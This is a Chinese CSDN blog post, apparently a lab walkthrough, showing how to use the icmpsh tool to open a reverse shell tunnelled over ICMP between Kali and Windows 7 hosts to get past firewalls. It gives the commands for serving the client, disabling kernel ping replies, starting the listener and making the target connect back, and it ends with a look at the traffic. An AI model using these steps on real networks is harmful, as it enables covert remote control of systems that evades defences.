ICMP隧道之icmpsh利用

最新推荐文章于 2024-03-28 22:18:44 发布
最新推荐文章于 2024-03-28 22:18:44 发布
阅读量577 收藏
点赞数
分类专栏: 内网渗透 文章标签: icmp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zlirving_/article/details/113780982
版权

目录

ICMP隧道

icmp隧道简单、实用,是一个比较特殊的协议。在一般的通信协议里,如果两台设备进行通信肯定需要开放端口,而在icmp协议中则不需要。最常见的icmp消息为ping命令的回复,攻击者可以利用命令行得到比回复更多的icmp请求。
利用价值,在利用 ping 穿透防火墙的检测,因为通常防火墙是不会屏蔽 ping 数据包的。

icmpsh

icmpsh是一个简单的ICMP反弹shell工具,拥有用C,Perl和Python实现的POSIX兼容主控端和一个win32的受控端。相比其他类似的开源工具来说,icmpsh的优点是在目标机器上运行时不需要管理员权限。

这一工具干净、简单并且便携。受控端(客户端)使用C语言实现。只能运行在目标Windows机器上,而主控端(服务端)由于已经有C和Perl实现的版本,而且之后又移植到了Python上,因此可以运行在任何平台的攻击者机器中。

icmpsh很容易被安装并用作c2通道。可以通过Github下载并在攻击者机器中部署icmpsh。

实验环境
  1. kali2020 : 192.168.101.129,python2
  2. win7 : 192.168.101.130
利用

1.在攻击机git下icmpsh
git clone https://github.com/inquisb/icmpsh.git
在这里插入图片描述
python2开启SimpleHTTPServer服务让靶机下载icmpsh.exe
在这里插入图片描述
在这里插入图片描述
2 安装 python的impacket库,保证对TCP、UDP、ICMP等协议的访问
apt-get install python-impacket或者pip install impacket
在这里插入图片描述
3.需关闭本机icmp应答,防止内核自己对ping包进行响应
sysctl -w net.ipv4.icmp_echo_ignore_all=1
在这里插入图片描述
4.运行 ./run.sh
输入目标IP,将弹出需要在目标主机上运行的命令并开始监听
在这里插入图片描述
(未安装impacket?)
再换个方式安装
git clone https://github.com/CoreSecurity/impacket.git
cd impacket/
python2 setup.py install
在这里插入图片描述
(有这些了还是不行…感觉是python2,3的问题)
再换个方式安装
官网手动下载该impacket模块 https://www.cnpython.com/pypi/impacket
解压 tar -zxvf impacket 0.9.19.tar.gz
安装 python2 setup.py install
(还是缺了点啥…待解决)
在这里插入图片描述
如果读者在这里顺利的话,可直接将以上箭头处命令复制键入到目标机命令行即可

5.运行icmpsh_m.py
run.sh是用不了那就使用工具中的icmpsh_m.py文件(这个在一开始的时候也是不可以用的,在python2中安装了impacket模块就可以用了)
python2 icmpsh_m.py 本机ip 目标ip
在这里插入图片描述
目标机:
可以通过后门管理工具上传或者远程下载icmsh.exe到目标机,键入以下命令即可回连攻击机
icmpsh.exe -t [攻击机]
在这里插入图片描述
在目标机输入需要在目标机执行的命令后,在攻击机即可看到目标机的shell
在这里插入图片描述

查看流量包

由于数据是利用PING请求/回复报文通过网络层传输,因此并不需要指定服务或者端口。这种流量是无法被基于代理的防火墙检测到的,因此这种方式可能绕过一些防火墙规则
1.靶机通过icmp协议回连到攻击机
在这里插入图片描述
2.攻击机通过仍然通过icmp协议将指令带到攻击机执行并将数据返回到攻击机
在这里插入图片描述
在这里插入图片描述
但是可以看到数据是未经加密混淆的,若遇到一些入侵检测系统,敏感的命令与回显仍然会被检测到
 

GOT IT!

 
******************************************************
小实验小结,具体测试利用方式需根据具体实践场景~

想冲大厂的癞蛤蟆
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
内网隧道代理技术(二十五)之 ICMP隧道反弹SHELL
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
09-14 258
由于ICMP报文自身可以携带数据,而且ICMP报文是由系统内核处理的,不占用任何端口,因此具有很高的隐蔽性。把数据隐藏在ICMP数据包包头的data字段中,建立隐蔽通道,可以实现绕过防火墙和入侵检测系统的阻拦。
icmpsh.zip
05-17
内部网络中的大多数系统都位于防火墙和公司代理之后,以便控制入站和出站Internet流量。防火墙可以阻止反向并绑定TCP连接。但是大多数情况下允许ICMP流量。因此,可以将此协议用作隐蔽通道,以便获取shell并在目标主机上远程执行命令。
ICMP隧道技术实现防火墙穿透
weixin_43225966的博客
04-13 627
icmp隧道技术实现防火墙穿透
内网穿透_ICMP_icmpsh
最新发布
tubug的博客
03-28 919
常见的ICMP隧道工具有:icmpsh、PingTunnel、icmptunnel、powershell icmp等。数据包(例如:ping操作)的传输过程中,当目标主机不可达,或者请求超时,都是ICMP在运作(生成相应的错误信息)这样,当其他设备向你的机器发送 ICMP 请求时,icmpsh 可以截获这些请求并作出响应,而不是系统本身去响应。使用 icmpsh 工具时,它会监听网络上的 ICMP 请求,并模拟系统的 ICMP 去响应。为了防止系统本身去响应icmp,所以要关闭本机的icmp响应。
icmp隧道搭建(pingtunnel的使用)
Innocence_0的博客
07-26 201
在上个星期一个风和日丽得早上,上班刚打开电脑,师兄就发来了这样一条消息然后我就去测试了,访问页面如下,页面显示探针路径C:/phpStudy/WWW/l.php随手输了个root root检测,没想到真的是(靶场嘛,比较简单,大家勿喷哈~)使用phpmyadmin连接MySQL,输入root:root。
ICMP隧道技术 - icmpsh
shawdow_bug的博客
09-12 942
ICMP隧道工具 icmpsh 使用。
【内网学习笔记】6、ICMP隧道工具使用
TeamsSix 的 CSDN 空间
04-07 720
1、介绍 在内网中,如果攻击者使用 HTTP、DNS 等应用层隧道都失败了,那么或许可以试试网络层的 ICMP 隧道ICMP 协议最常见的场景就是使用 ping 命令,而且一般防火墙都不会禁止 ping 数据包。 因此我们便可以将 TCP/UDP 数据封装到 ICMP 的 ping 数据包中,从而绕过防火墙的限制。 2、建立 ICMP 隧道工具 用于建立 ICMP 隧道的工具常见有:ptunnel、icmpshicmptunnel 等 ptunnel ptunnel 全称 PingTunnel,Kali
icmp隧道
热门推荐
03-16 1万+
ICMP 隧道 原理 icmp报文中除了必须要有的类型、校验和等等还可以携带一定长度的可选数据,这也就是我们可以用来搭建隧道的原因,不过每次报文携带得的字节不会很多,所以有点慢。 icmpsh icmpsh是一款使用简单,而且不需要管理员权限即可运行的程序,可以较为简答的搭建隧道并同时获得目标shell 攻击机是kali, IP地址:192.168.220.129 下载icmpsh 到本地 git clone https://github.com/inquisb/icmpsh.git #下载工具 apt-
python socket ICMP 进行通信
troublenbfriend的博客
11-01 1334
由此可见,当发送的数据包足够大时,平均丢包率为70%
浅谈内网工具ICMP的使用以及遇到的坑
markecheng的博客
11-26 1009
内网渗透之隐藏通信隧道ICMP协议以及ICMP工具的使用 ICMP的使用简介 -t host :要向其发送ping请求的主机ip地址。此选项是必需的! -r:发送一个包含字符串“Test1234”的测试icmp请求,然后退出。这是用来测试连接的。 -d milliseconds:请求之间的延迟(毫秒) -o milliseconds:毫秒响应超时(毫秒)。如果没有及时收到回复,奴隶将增加一个空白计数器。如果计数器达到某个限制,则从机将退出。如果收到响应,计数器将被设置回0。 -b num :空白数限制(退出
Linux编程之ICMP洪水攻击
09-15
主要为大家详细介绍了Linux编程之ICMP洪水攻击的相关资料,具有一定的参考价值,感兴趣的小伙伴们可以参考一下
利用ICMP进行路由跟踪
11-25
利用ICMP进行路由跟踪 计算机网络作业 vc调试通过
DNS与ICMP隧道资料
11-01
以前自己收集的一些DNS和ICMP隧道技术的文档, 非常有用, 包括源代码及文档资料, 欢迎下载
ICMP-Tx:ICMP隧道
07-03
ICMP-Tx 创建具有自定义数据内容的 ICMP 数据包。 苹果电脑 你需要root权限才能启动start.py sudo ./start.py
内网渗透之隐藏隧道技术
Zlirving_的博客
05-07 1715
  个人学习笔记及归纳总结,学习内网渗透的必备基础(干货)   隐藏隧道技术即是,绕过端口屏蔽的通信方式 判断内网连通性 imcp ping [ip] tcp nc -zv [ip] [port] http curl 支持文件上传和下载等。linux自带,windows须安装 curl [域名:端口] 设代理 curl -x [proxy-ip:port] [域名] dn...
利用ZeroLogon漏洞接管域控权限
Zlirving_的博客
02-25 1572
目录漏洞介绍实验环境实验开始进入域漏洞验证漏洞利用置空域控密码获取新凭据获取域控半交互式shell获取初始凭据(sam)还原域控密码 漏洞介绍 CVE-2020-14722 (又称ZeroLogon) 是一个windows域控中严重的远程权限提升漏洞。它是因为微软在Netlogon协议中没有正确使用加密算法而导致的漏洞。由于微软在进行AES加密运算过程中,使用了AES-CFB8模式并且错误的将IV设置为全零,这使得攻击者在明文(client challenge)、IV等要素可控的情况下,存在较高概率使得产生
利用mimikatz抓取密码及散列值
Zlirving_的博客
01-15 1451
目录windows系统散列值获取前提介绍在线读取散列值及明文密码离线读取lsass.dmp文件防范 windows系统散列值获取 域环境中,用户信息存储在ntds.dit,加密成散列值(都为散列加密算法) LM HASH:DES加密。明文密码限定在14为以内。不够字节用0补齐 NTLM HASH:MD4加密。 前提介绍 抓取密码之前,必须为最高权限。windows下用户名、散列值及其他安全信息都保存在SAM文件中。lsass.exe进程用于实现windows安全策略. 工具: Mimikatz Procd
frp内网穿透工具的使用
Zlirving_的博客
03-11 1325
目录frp工具介绍frp工具原理frp配置文件默认的frps.ini默认的frpc.inifrp下载安装与使用端口转发服务内网穿透服务 FRP官方文档 frp工具介绍 为什么需要内网穿透? 我们的物理机、服务器可能处于路由器后或者处于内网之中。如果我们想直接访问到内网设备的服务,一般来说要通过一些转发或者P2P(端到端)组网软件的帮助。 对于FRP穿透工具来说,它具有端口转发及以外的功能,端口转发是只会进行单个端口的流量转发,但是这在渗透中往往是不行的,FRP可以进行内网的全流量的数据代理。 frp介绍
ICMP隧道之PingTunnel利用
Zlirving_的博客
02-13 1162
目录ICMP隧道PingTunnel环境配置实验利用查看流量包总结 ICMP隧道 icmp隧道简单、实用,是一个比较特殊的协议。在一般的通信协议里,如果两台设备进行通信肯定需要开放端口,而在icmp协议中则不需要。最常见的icmp消息为ping命令的回复,攻击者可以利用命令行得到比回复更多的icmp请求。 利用价值,在利用 ping 穿透防火墙的检测,因为通常防火墙是不会屏蔽 ping 数据包的。 PingTunnel 用于通过ICMP回显请求和答复数据包(通常称为ping请求和答复)可靠地建立TCP连接的
内网渗透--ICMP隧道
05-16
ICMP隧道是一种利用Internet控制消息协议(ICMP)的技术,将其他协议的数据包封装在ICMP数据包中,从而在不被检测的情况下在网络中传输数据。对于内网渗透而言,ICMP隧道可以用于将攻击者的数据从受害主机中转出,绕...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值